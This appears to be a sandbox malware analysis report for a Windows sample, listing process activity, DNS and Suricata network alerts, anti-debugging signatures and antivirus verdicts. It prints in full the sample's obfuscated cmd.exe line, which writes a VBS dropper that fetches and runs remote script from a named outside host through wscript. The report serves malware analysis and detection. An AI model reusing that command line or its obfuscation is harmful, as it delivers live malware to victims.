Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 14, 2023, 2:33 p.m. | Sept. 14, 2023, 2:35 p.m. |
-
-
cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"d57=".":bxu0="i":nv7="g":nu25=":":GetO^">%Public%\sm86fa81.vbs&echo|set /p=^"bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")^">>%Public%\sm86fa81.vbs&cd c:\windows\system32\&cmd /c start %Public%\sm86fa81.vbs
496-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
2104 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="d57=".":bxu0="i":nv7="g":nu25=":":GetO" 1>C:\Users\Public\sm86fa81.vbs"
2140 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
2224 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")" 1>>C:\Users\Public\sm86fa81.vbs"
2260 -
-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\sm86fa81.vbs"
2388
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
mgwdg.jungleheart.com | 206.71.149.162 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 206.71.149.162:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
UDP 192.168.56.103:52760 -> 164.124.101.2:53 | 2035988 | ET INFO DYNAMIC_DNS Query to a *.jungleheart .com Domain | Potentially Bad Traffic |
TCP 206.71.149.162:443 -> 192.168.56.103:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.103:49172 -> 206.71.149.162:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 206.71.149.162:443 -> 192.168.56.103:49174 | 2260001 | SURICATA Applayer Wrong direction first Data | Generic Protocol Command Decode |
Suricata TLS
No Suricata TLS
pdb_path | C:\U2\wx6\Release\wx6.pdb |
file | C:\Users\Public\sm86fa81.vbs |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p="d57=".":bxu0="i":nv7="g":nu25=":":GetO" 1>C:\Users\Public\sm86fa81.vbs" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")" 1>>C:\Users\Public\sm86fa81.vbs" |
cmdline | C:\Windows\system32\cmd.exe /c echo|set /p=^"d57=".":bxu0="i":nv7="g":nu25=":":GetO^">%Public%\sm86fa81.vbs&echo|set /p=^"bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")^">>%Public%\sm86fa81.vbs&cd c:\windows\system32\&cmd /c start %Public%\sm86fa81.vbs |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
Bkav | W32.AIDetectMalware |
FireEye | Generic.mg.87f6774e25128d08 |
BitDefenderTheta | Gen:NN.ZexaF.36662.xuW@amwLjzhi |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (high confidence) |
APEX | Malicious |
Cynet | Malicious (score: 100) |
Rising | Trojan.Generic@AI.96 (RDML:dDIpoxiglDXj0hXpLNu+UA) |
SentinelOne | Static AI - Suspicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
DeepInstinct | MALICIOUS |
CrowdStrike | win/malicious_confidence_100% (D) |
file | C:\Windows\SysWOW64\wscript.exe |